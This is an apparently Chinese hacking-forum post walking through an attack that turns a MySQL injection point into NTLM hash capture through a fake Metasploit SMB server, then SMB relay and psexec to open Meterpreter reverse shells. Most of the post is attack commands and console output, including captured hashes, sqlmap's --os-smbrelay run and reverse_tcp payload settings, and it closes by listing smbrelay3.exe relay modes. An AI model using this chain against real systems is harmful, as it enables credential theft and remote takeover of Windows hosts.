切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
15 MSF 综合利用: MYSQL & SMBRelay攻击[复制链接]
发表于 2012-8-6 15:38:20 | 显示全部楼层 |!read_mode!
下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功!


下面来PENTEST : 一个注入点,他是ROOT的权限

我们来尝试他能不能读文件,ROOT权限应该能读


恩 ,能读文件 (惊现HELEL大黑客!)

下面本地伪造个SMB SERVER服务器


  1. msf > use auxiliary/server/capture/smb
  2. msf  auxiliary(smb) > show options
  3.   
  4. Module options (auxiliary/server/capture/smb):
  5.   
  6.    Name        Current Setting   Required  Description
  7.    ----        ---------------   --------  -----------
  8.    CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
  9.    CHALLENGE   1122334455667788  yes       The 8 byte challenge
  10.    JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
  11.    SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  12.    SRVPORT     445               yes       The local port to listen on.
  13.    SSL         false             no        Negotiate SSL for incoming connections
  14.    SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
  15.    SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  16.   
  17. msf  auxiliary(smb) > exploit
  18. [*] Auxiliary module execution completed
  19.   
  20. [*] Server started.
  21. msf  auxiliary(smb) >
复制代码
然后读本共享试试


^_^  成功获得了 NTLM  ,

NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36


下面就能用METASPLOIT的 exploit/windows/smb/psexec 模块 或者NESSUS的SMB Shell获得系统权限
  1. msf  exploit(psexec) > exploit
  2.   
  3. [*] Started reverse handler on 192.1.1.1:1111
  4. [*] Connecting to the server...
  5. [*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
  6. [*] Uploading payload...
  7. [*] Created \HgLceCLd.exe...
  8. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
  9. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
  10. [*] Obtaining a service manager handle...
  11. [*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
  12. [*] Closing service handle...
  13. [*] Opening service...
  14. [*] Starting the service...
  15. [*] Removing the service...
  16. [*] Closing service handle...
  17. [*] Deleting \HgLceCLd.exe...
  18. [*] Sending stage (752128 bytes) to 192.1.1.130
  19. [*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800
复制代码
如果你嫌弃上面的麻烦。你可以选择SQLMAP。强大的注入工具SQLMAP提供一条龙服务。
  1. brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
  2. [sudo] password for brk:
  3.   
  4.     sqlmap/0.9 - automatic SQL injection and database takeover tool
  5.   
  6. http://sqlmap.sourceforge.net
  7.   
  8. [*] starting at: 17:04:54
  9.   
  10. [17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
  11. [17:04:54] [INFO] testing connection to the target url
  12. [17:04:54] [INFO] testing if the url is stable, wait a few seconds
  13. [17:04:55] [INFO] url is stable
  14. ----------------省略-------------
  15. [17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
  16. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
  17. sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
  18. ---
  19. ---
  20.   
  21. [17:05:11] [INFO] the back-end DBMS is MySQL
  22. web server operating system: Windows
  23. web application technology: Apache 2.0.63, PHP 5.2.14
  24. [17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
  25. which connection type do you want to use?
  26. [1] Reverse TCP: Connect back from the database host to this machine (default)
  27. [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
  28. [3] Bind TCP: Listen on the database host for a connection
  29. > 1
  30. which is the local address? [192.1.1.1]
  31. which local port number do you want to use? [50803] 5588
  32. which payload do you want to use?
  33. [1] Meterpreter (default)
  34. [2] Shell
  35. [3] VNC
  36. > 1
  37. which SMB port do you want to use?
  38. [1] 139/TCP
  39. [2] 445/TCP (default)
  40. > 2
  41. [17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..
  42.   
  43. [*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
  44. resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
  45. resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
  46. SRVHOST => 192.1.1.1
  47. resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
  48. SRVPORT => 445
  49. resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
  50. PAYLOAD => windows/meterpreter/reverse_tcp
  51. resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
  52. LPORT => 5588
  53. resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
  54. LHOST => 192.1.1.1
  55. resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
  56. [*] Exploit running as background job.
  57. ---------------------------------
  58. [*] Started reverse handler on 192.1.1.1:5588
  59. [*] Server started.
  60. [*] Deleting \AaTNBUvw.exe...
  61. [*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270\Administrator
  62. [*] Sending stage (752128 bytes) to 192.1.1.130
  63. [*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800
  64.   
  65. Active sessions
  66. ===============
  67.   
  68.   Id  Type                   Information  Connection
  69.   --  ----                   -----------  ----------
  70.   1   meterpreter x86/win32               192.1.1.1:5588 -> 192.1.1.130:1205
复制代码
::__IHACKLOG_REMOTE_IMAGE_AUTODOWN_BLOCK__::4 如果你是WINDOWS系统呢??  你可以用这个工具来进行攻击smbrelay3.exe他提供5种攻击方式:* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.你懂的



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-23 14:47

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部